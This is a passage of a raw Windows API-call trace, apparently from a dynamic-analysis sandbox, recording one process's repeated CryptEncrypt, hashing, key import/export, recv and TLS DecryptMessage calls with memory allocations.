pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.695] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.695] free (_Block=0x0) [0157.695] free (_Block=0x3def010) [0157.695] malloc (_Size=0x1fd) returned 0x3def010 [0157.696] free (_Block=0x0) [0157.696] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.696] CryptHashData (hHash=0x432af8, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.696] malloc (_Size=0x14) returned 0x3f65340 [0157.696] free (_Block=0x0) [0157.696] CryptGetHashParam (in: hHash=0x432af8, dwParam=0x2, pbData=0x3f65340, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65340, pdwDataLen=0x339faec) returned 1 [0157.696] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.696] free (_Block=0x3f65340) [0157.696] CryptDestroyHash (hHash=0x432af8) returned 1 [0157.696] free (_Block=0x3def010) [0157.696] free (_Block=0x606108) [0157.696] malloc (_Size=0x1fd) returned 0x606108 [0157.696] free (_Block=0x0) [0157.696] malloc (_Size=0x1) returned 0x3f4c0f8 [0157.697] free (_Block=0x0) [0157.697] malloc (_Size=0x1) returned 0x3f4bf18 [0157.697] free (_Block=0x0) [0157.697] free (_Block=0x0) [0157.697] free (_Block=0x3f4c0f8) [0157.697] SetEvent (hEvent=0x5d0) returned 1 [0157.697] SetEvent (hEvent=0x5d4) returned 1 [0157.697] free (_Block=0x3f4bf18) [0157.697] free (_Block=0x606108) [0157.697] free (_Block=0x3d81e60) [0157.697] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0157.697] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0158.146] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0158.146] malloc (_Size=0x1fd) returned 0x606108 [0158.146] free (_Block=0x0) [0158.146] malloc (_Size=0x1fd) returned 0x3d81e60 [0158.146] free (_Block=0x0) [0158.146] free (_Block=0x0) [0158.147] free (_Block=0x606108) [0158.147] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x432bf8) returned 1 [0158.151] CryptExportKey (in: hKey=0x432bf8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0158.151] CryptExportKey (in: hKey=0x432bf8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0158.151] malloc (_Size=0x80) returned 0x609c70 [0158.151] free (_Block=0x0) [0158.151] CryptDestroyKey (hKey=0x432bf8) returned 1 [0158.151] malloc (_Size=0x64) returned 0x60b230 [0158.151] free (_Block=0x0) [0158.151] malloc (_Size=0x80) returned 0x609d80 [0158.151] free (_Block=0x0) [0158.151] malloc (_Size=0xc0) returned 0x3df0550 [0158.151] free (_Block=0x609d80) [0158.151] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0158.151] CryptHashData (hHash=0x432df8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0158.152] malloc (_Size=0x14) returned 0x3f65460 [0158.152] free (_Block=0x0) [0158.152] CryptGetHashParam (in: hHash=0x432df8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339fa54) returned 1 [0158.152] CryptDestroyHash (hHash=0x432df8) returned 1 [0158.152] free (_Block=0x3f65460) [0158.152] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0158.152] CryptHashData (hHash=0x432d38, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0158.152] malloc (_Size=0x14) returned 0x3f653e0 [0158.152] free (_Block=0x0) [0158.152] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f653e0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653e0, pdwDataLen=0x339fa54) returned 1 [0158.152] CryptDestroyHash (hHash=0x432d38) returned 1 [0158.152] free (_Block=0x3f653e0) [0158.152] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0158.152] CryptHashData (hHash=0x432bb8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0158.152] malloc (_Size=0x14) returned 0x3f65300 [0158.152] free (_Block=0x0) [0158.152] CryptGetHashParam (in: hHash=0x432bb8, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x339fa54) returned 1 [0158.153] CryptDestroyHash (hHash=0x432bb8) returned 1 [0158.153] free (_Block=0x3f65300) [0158.153] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0158.153] CryptHashData (hHash=0x432e78, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0158.153] malloc (_Size=0x14) returned 0x3f653c0 [0158.153] free (_Block=0x0) [0158.153] CryptGetHashParam (in: hHash=0x432e78, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x339fa54) returned 1 [0158.153] CryptDestroyHash (hHash=0x432e78) returned 1 [0158.153] free (_Block=0x3f653c0) [0158.153] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0158.153] CryptHashData (hHash=0x432df8, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0158.153] malloc (_Size=0x14) returned 0x3f65360 [0158.153] free (_Block=0x0) [0158.153] CryptGetHashParam (in: hHash=0x432df8, dwParam=0x2, pbData=0x3f65360, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65360, pdwDataLen=0x339fa54) returned 1 [0158.153] CryptDestroyHash (hHash=0x432df8) returned 1 [0158.154] free (_Block=0x3f65360) [0158.154] free (_Block=0x3df0550) [0158.154] malloc (_Size=0x50) returned 0x3d9aa38 [0158.154] free (_Block=0x0) [0158.154] free (_Block=0x60b230) [0158.154] free (_Block=0x609c70) [0158.154] malloc (_Size=0xb8) returned 0x3df0550 [0158.154] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0600 | out: phHash=0x3df0600) returned 1 [0158.154] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0604 | out: phHash=0x3df0604) returned 1 [0158.154] CryptHashData (hHash=0x432b78, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0158.154] CryptHashData (hHash=0x432bb8, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0158.154] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x4328f8) returned 1 [0158.154] CryptSetKeyParam (hKey=0x4328f8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0158.154] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432df8) returned 1 [0158.154] CryptSetKeyParam (hKey=0x432df8, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0158.154] free (_Block=0x3d9aa38) [0158.154] malloc (_Size=0x10) returned 0x3648d70 [0158.155] free (_Block=0x0) [0158.155] SetEvent (hEvent=0x380) returned 1 [0158.155] free (_Block=0x3d81e60) [0158.155] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0158.155] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0188.641] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0188.641] malloc (_Size=0x1fd) returned 0x606108 [0188.641] free (_Block=0x0) [0188.641] malloc (_Size=0x1fd) returned 0x3d81e60 [0188.641] free (_Block=0x0) [0188.641] free (_Block=0x0) [0188.641] free (_Block=0x606108) [0188.641] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x4328f8) returned 1 [0188.648] CryptExportKey (in: hKey=0x4328f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0188.648] CryptExportKey (in: hKey=0x4328f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0188.648] malloc (_Size=0x80) returned 0x60a468 [0188.648] free (_Block=0x0) [0188.648] CryptDestroyKey (hKey=0x4328f8) returned 1 [0188.648] malloc (_Size=0x64) returned 0x60b000 [0188.648] free (_Block=0x0) [0188.648] malloc (_Size=0x80) returned 0x609b60 [0188.648] free (_Block=0x0) [0188.648] malloc (_Size=0xc0) returned 0x3df0550 [0188.648] free (_Block=0x609b60) [0188.648] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0188.648] CryptHashData (hHash=0x432d78, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0188.649] malloc (_Size=0x14) returned 0x3f65300 [0188.649] free (_Block=0x0) [0188.649] CryptGetHashParam (in: hHash=0x432d78, dwParam=0x2, pbData=0x3f65300, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65300, pdwDataLen=0x339fa54) returned 1 [0188.649] CryptDestroyHash (hHash=0x432d78) returned 1 [0188.649] free (_Block=0x3f65300) [0188.649] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0188.649] CryptHashData (hHash=0x432738, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0188.649] malloc (_Size=0x14) returned 0x3f65460 [0188.649] free (_Block=0x0) [0188.649] CryptGetHashParam (in: hHash=0x432738, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339fa54) returned 1 [0188.649] CryptDestroyHash (hHash=0x432738) returned 1 [0188.649] free (_Block=0x3f65460) [0188.649] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0188.649] CryptHashData (hHash=0x432c78, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0188.649] malloc (_Size=0x14) returned 0x3f65480 [0188.649] free (_Block=0x0) [0188.649] CryptGetHashParam (in: hHash=0x432c78, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x339fa54) returned 1 [0188.649] CryptDestroyHash (hHash=0x432c78) returned 1 [0188.649] free (_Block=0x3f65480) [0188.650] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0188.650] CryptHashData (hHash=0x432778, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0188.650] malloc (_Size=0x14) returned 0x3f65280 [0188.650] free (_Block=0x0) [0188.650] CryptGetHashParam (in: hHash=0x432778, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0188.650] CryptDestroyHash (hHash=0x432778) returned 1 [0188.650] free (_Block=0x3f65280) [0188.650] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fa5c | out: phHash=0x339fa5c) returned 1 [0188.650] CryptHashData (hHash=0x432a38, pbData=0x3df0550, dwDataLen=0x81, dwFlags=0x0) returned 1 [0188.650] malloc (_Size=0x14) returned 0x3f65280 [0188.650] free (_Block=0x0) [0188.650] CryptGetHashParam (in: hHash=0x432a38, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x339fa54) returned 1 [0188.650] CryptDestroyHash (hHash=0x432a38) returned 1 [0188.650] free (_Block=0x3f65280) [0188.650] free (_Block=0x3df0550) [0188.650] malloc (_Size=0x50) returned 0x3d9b010 [0188.650] free (_Block=0x0) [0188.650] free (_Block=0x60b000) [0188.650] free (_Block=0x60a468) [0188.651] malloc (_Size=0xb8) returned 0x3df0550 [0188.651] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0600 | out: phHash=0x3df0600) returned 1 [0188.651] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x3df0604 | out: phHash=0x3df0604) returned 1 [0188.651] CryptHashData (hHash=0x432778, pbData=0x339fa74, dwDataLen=0x14, dwFlags=0x0) returned 1 [0188.651] CryptHashData (hHash=0x4328f8, pbData=0x339faf4, dwDataLen=0x14, dwFlags=0x0) returned 1 [0188.651] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432b78) returned 1 [0188.651] CryptSetKeyParam (hKey=0x432b78, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0188.651] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa8c | out: phKey=0x339fa8c*=0x432738) returned 1 [0188.651] CryptSetKeyParam (hKey=0x432738, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0188.651] free (_Block=0x3d9b010) [0188.651] malloc (_Size=0x10) returned 0x3648f08 [0188.651] free (_Block=0x0) [0188.651] SetEvent (hEvent=0x380) returned 1 [0188.651] free (_Block=0x3d81e60) [0188.651] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0188.651] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0189.325] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0189.325] malloc (_Size=0x1fd) returned 0x606108 [0189.325] free (_Block=0x0) [0189.325] malloc (_Size=0x1fd) returned 0x3d81e60 [0189.326] free (_Block=0x0) [0189.326] free (_Block=0x0) [0189.326] free (_Block=0x606108) [0189.326] malloc (_Size=0x1fd) returned 0x606108 [0189.326] free (_Block=0x0) [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.326] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0189.327] malloc (_Size=0x1fd) returned 0x3f68818 [0189.327] free (_Block=0x0) [0189.328] free (_Block=0x3d81e60) [0189.328] malloc (_Size=0x1fd) returned 0x3d81e60 [0189.328] free (_Block=0x0) [0189.328] CryptDuplicateHash (in: hHash=0x4328f8, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0189.328] CryptHashData (hHash=0x432bb8, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.328] malloc (_Size=0x14) returned 0x3f65480 [0189.328] free (_Block=0x0) [0189.328] CryptGetHashParam (in: hHash=0x432bb8, dwParam=0x2, pbData=0x3f65480, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f65480, pdwDataLen=0x339faec) returned 1 [0189.328] CryptHashData (hHash=0x4328f8, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0189.328] free (_Block=0x3f65480) [0189.328] CryptDestroyHash (hHash=0x432bb8) returned 1 [0189.328] free (_Block=0x3d81e60) [0189.328] free (_Block=0x606108) [0189.328] malloc (_Size=0x1fd) returned 0x606108 [0189.328] free (_Block=0x0) [0189.328] malloc (_Size=0x94) returned 0x3594e80 [0189.328] free (_Block=0x0) [0189.328] malloc (_Size=0x94) returned 0x36918f0 [0189.328] free (_Block=0x0) [0189.328] free (_Block=0x0) [0189.328] free (_Block=0x3594e80) [0189.329] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f5d8, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f5d4 | out: phKey=0x339f5d4*=0x432bb8) returned 1 [0189.332] CryptExportKey (in: hKey=0x432bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f23c, pdwDataLen=0x339f224 | out: pbData=0x339f23c*, pdwDataLen=0x339f224*=0x90) returned 1 [0189.332] CryptExportKey (in: hKey=0x432bb8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f908, pdwDataLen=0x339f5cc | out: pbData=0x339f908*, pdwDataLen=0x339f5cc*=0x90) returned 1 [0189.332] malloc (_Size=0x80) returned 0x60a248 [0189.332] free (_Block=0x0) [0189.332] CryptDestroyKey (hKey=0x432bb8) returned 1 [0189.332] malloc (_Size=0x64) returned 0x60af20 [0189.332] free (_Block=0x0) [0189.332] malloc (_Size=0x80) returned 0x60a358 [0189.332] free (_Block=0x0) [0189.332] malloc (_Size=0xc0) returned 0x3d81e60 [0189.332] free (_Block=0x60a358) [0189.332] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, 